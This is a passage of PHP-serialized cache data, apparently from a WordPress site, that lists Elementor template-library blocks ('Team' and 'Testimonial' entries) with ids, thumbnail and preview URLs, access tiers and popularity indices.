19\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_9.png\";s:12:\"tmpl_created\";i:1520443371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:636;s:16:\"popularity_index\";i:300;s:11:\"trend_index\";i:465;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:781;a:21:{s:4:\"tmpl\";i:459;s:2:\"id\";i:4736;s:5:\"title\";s:7:\"Team 20\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_4.png\";s:12:\"tmpl_created\";i:1520443358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:637;s:16:\"popularity_index\";i:144;s:11:\"trend_index\";i:159;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:782;a:21:{s:4:\"tmpl\";i:467;s:2:\"id\";i:4818;s:5:\"title\";s:7:\"Team 21\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_9.png\";s:12:\"tmpl_created\";i:1520443373;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:638;s:16:\"popularity_index\";i:515;s:11:\"trend_index\";i:606;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:783;a:21:{s:4:\"tmpl\";i:461;s:2:\"id\";i:4759;s:5:\"title\";s:7:\"Team 22\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_5.png\";s:12:\"tmpl_created\";i:1520443362;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-22/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:639;s:16:\"popularity_index\";i:299;s:11:\"trend_index\";i:376;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:784;a:21:{s:4:\"tmpl\";i:460;s:2:\"id\";i:4746;s:5:\"title\";s:7:\"Team 23\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_4.png\";s:12:\"tmpl_created\";i:1520443360;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/team-23/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:640;s:16:\"popularity_index\";i:282;s:11:\"trend_index\";i:378;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:785;a:21:{s:4:\"tmpl\";i:457;s:2:\"id\";i:4718;s:5:\"title\";s:6:\"Team 4\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_3.png\";s:12:\"tmpl_created\";i:1520443354;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:641;s:16:\"popularity_index\";i:192;s:11:\"trend_index\";i:359;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:786;a:21:{s:4:\"tmpl\";i:456;s:2:\"id\";i:4706;s:5:\"title\";s:6:\"Team 5\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_2.png\";s:12:\"tmpl_created\";i:1520443352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:642;s:16:\"popularity_index\";i:149;s:11:\"trend_index\";i:299;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:787;a:21:{s:4:\"tmpl\";i:544;s:2:\"id\";i:6008;s:5:\"title\";s:6:\"Team 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_10.png\";s:12:\"tmpl_created\";i:1520443636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:643;s:16:\"popularity_index\";i:75;s:11:\"trend_index\";i:277;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:788;a:21:{s:4:\"tmpl\";i:454;s:2:\"id\";i:4690;s:5:\"title\";s:6:\"Team 7\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_1.png\";s:12:\"tmpl_created\";i:1520443348;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/team-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"Team\"]\";s:10:\"menu_order\";i:644;s:16:\"popularity_index\";i:243;s:11:\"trend_index\";i:402;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:789;a:21:{s:4:\"tmpl\";i:586;s:2:\"id\";i:4921;s:5:\"title\";s:14:\"Testimonial 10\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_5.png\";s:12:\"tmpl_created\";i:1520520562;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:645;s:16:\"popularity_index\";i:219;s:11:\"trend_index\";i:198;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:790;a:21:{s:4:\"tmpl\";i:582;s:2:\"id\";i:4889;s:5:\"title\";s:14:\"Testimonial 11\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-2.jpg\";s:12:\"tmpl_created\";i:1520520556;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:646;s:16:\"popularity_index\";i:557;s:11:\"trend_index\";i:522;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:791;a:21:{s:4:\"tmpl\";i:580;s:2:\"id\";i:4871;s:5:\"title\";s:14:\"Testimonial 12\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_3.png\";s:12:\"tmpl_created\";i:1520520552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:647;s:16:\"popularity_index\";i:262;s:11:\"trend_index\";i:391;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:792;a:21:{s:4:\"tmpl\";i:578;s:2:\"id\";i:4854;s:5:\"title\";s:14:\"Testimonial 13\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_2.png\";s:12:\"tmpl_created\";i:1520520549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:648;s:16:\"popularity_index\";i:637;s:11:\"trend_index\";i:741;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:793;a:21:{s:4:\"tmpl\";i:595;s:2:\"id\";i:4995;s:5:\"title\";s:14:\"Testimonial 14\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_12.png\";s:12:\"tmpl_created\";i:1520520577;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:649;s:16:\"popularity_index\";i:400;s:11:\"trend_index\";i:411;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:794;a:21:{s:4:\"tmpl\";i:593;s:2:\"id\";i:4979;s:5:\"title\";s:14:\"Testimonial 15\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_10.png\";s:12:\"tmpl_created\";i:1520520573;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:650;s:16:\"popularity_index\";i:568;s:11:\"trend_index\";i:544;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:795;a:21:{s:4:\"tmpl\";i:576;s:2:\"id\";i:4835;s:5:\"title\";s:14:\"Testimonial 16\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_1.png\";s:12:\"tmpl_created\";i:1520520546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:651;s:16:\"popularity_index\";i:399;s:11:\"trend_index\";i:401;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:796;a:21:{s:4:\"tmpl\";i:594;s:2:\"id\";i:4987;s:5:\"title\";s:14:\"Testimonial 17\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_12-1.png\";s:12:\"tmpl_created\";i:1520520575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:652;s:16:\"popularity_index\";i:159;s:11:\"trend_index\";i:199;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:797;a:21:{s:4:\"tmpl\";i:577;s:2:\"id\";i:4843;s:5:\"title\";s:14:\"Testimonial 18\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_2.png\";s:12:\"tmpl_created\";i:1520520548;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:653;s:16:\"popularity_index\";i:457;s:11:\"trend_index\";i:780;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:798;a:21:{s:4:\"tmpl\";i:579;s:2:\"id\";i:4863;s:5:\"title\";s:14:\"Testimonial 19\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_3.png\";s:12:\"tmpl_created\";i:1520520551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:654;s:16:\"popularity_index\";i:245;s:11:\"trend_index\";i:599;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:799;a:21:{s:4:\"tmpl\";i:581;s:2:\"id\";i:4880;s:5:\"title\";s:14:\"Testimonial 20\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/customers-1.jpg\";s:12:\"tmpl_created\";i:1520520554;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:655;s:16:\"popularity_index\";i:446;s:11:\"trend_index\";i:653;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:800;a:21:{s:4:\"tmpl\";i:583;s:2:\"id\";i:4897;s:5:\"title\";s:14:\"Testimonial 21\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_5.png\";s:12:\"tmpl_created\";i:1520520557;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:656;s:16:\"popularity_index\";i:78;s:11:\"trend_index\";i:289;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:801;a:21:{s:4:\"tmpl\";i:584;s:2:\"id\";i:4905;s:5:\"title\";s:14:\"Testimonial 22\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_6.png\";s:12:\"tmpl_created\";i:1520520559;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-22/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:657;s:16:\"popularity_index\";i:121;s:11:\"trend_index\";i:221;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:802;a:21:{s:4:\"tmpl\";i:585;s:2:\"id\";i:4913;s:5:\"title\";s:14:\"Testimonial 23\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_7.png\";s:12:\"tmpl_created\";i:1520520561;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-23/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:658;s:16:\"popularity_index\";i:247;s:11:\"trend_index\";i:566;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:803;a:21:{s:4:\"tmpl\";i:575;s:2:\"id\";i:4826;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_1.png\";s:12:\"tmpl_created\";i:1520520544;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/testimonial-24-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:659;s:16:\"popularity_index\";i:256;s:11:\"trend_index\";i:395;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:804;a:21:{s:4:\"tmpl\";i:587;s:2:\"id\";i:4929;s:5:\"title\";s:14:\"Testimonial 24\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_8.png\";s:12:\"tmpl_created\";i:1520520564;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-24/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:660;s:16:\"popularity_index\";i:49;s:11:\"trend_index\";i:206;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:805;a:21:{s:4:\"tmpl\";i:591;s:2:\"id\";i:4963;s:5:\"title\";s:14:\"Testimonial 25\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_10.png\";s:12:\"tmpl_created\";i:1520520570;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/testimonial-25-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:661;s:16:\"popularity_index\";i:417;s:11:\"trend_index\";i:546;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:806;a:21:{s:4:\"tmpl\";i:592;s:2:\"id\";i:4971;s:5:\"title\";s:14:\"Testimonial 26\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_11.png\";s:12:\"tmpl_created\";i:1520520572;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-26/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:662;s:16:\"popularity_index\";i:649;s:11:\"trend_index\";i:718;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:807;a:21:{s:4:\"tmpl\";i:589;s:2:\"id\";i:4947;s:5:\"title\";s:14:\"Testimonial 27\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_white_9.png\";s:12:\"tmpl_created\";i:1520520567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-27/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:663;s:16:\"popularity_index\";i:221;s:11:\"trend_index\";i:496;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:808;a:21:{s:4:\"tmpl\";i:590;s:2:\"id\";i:4955;s:5:\"title\";s:14:\"Testimonial 